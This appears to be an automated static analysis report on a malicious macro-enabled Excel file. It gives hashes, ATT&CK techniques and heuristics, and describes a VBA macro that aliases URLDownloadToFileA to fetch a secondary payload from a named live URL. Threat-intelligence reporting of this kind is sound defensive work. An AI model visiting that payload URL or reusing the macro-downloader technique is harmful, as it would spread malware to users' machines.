Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 990385a8773961b1…

MALICIOUS

Office (OOXML) / .XLSM

27.9 KB Created: 2022-08-31 10:51:53 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2022-08-31
MD5: dbd3679d4767ab6c067d10a7e4ebd37c SHA-1: 463816e7ef239f5d750034dd0e1cad6c0a6304b5 SHA-256: 990385a8773961b193753f5a0f48adeb0c8b57d639f2441369416112bb96b043
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_DOWNLOAD indicates the presence of URLDownloadToFile in VBA, a common technique for downloading secondary payloads. The VBA script confirms this by calling the `allestimento` function (an alias for URLDownloadToFileA) with a deobfuscated URL. The script attempts to download a file from 'https://pesyastoyatryam.com/10411611611211558P92C92o10197Q11512111611111410597m10846y99N111109' to a temporary location, which is then likely executed.

Heuristics 3

  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
e16effa28c9698beb5d891fceb0272e2a13ccfc94bf16bd8cd7430cb67d8efda		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2684 bytes
vbaProject_00.bin
672511c72749b52dd43ba992ac10dc88f1d3d6f7cb63396155a54413a8d32770		 vba-project OOXML VBA project: xl/vbaProject.bin 21504 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.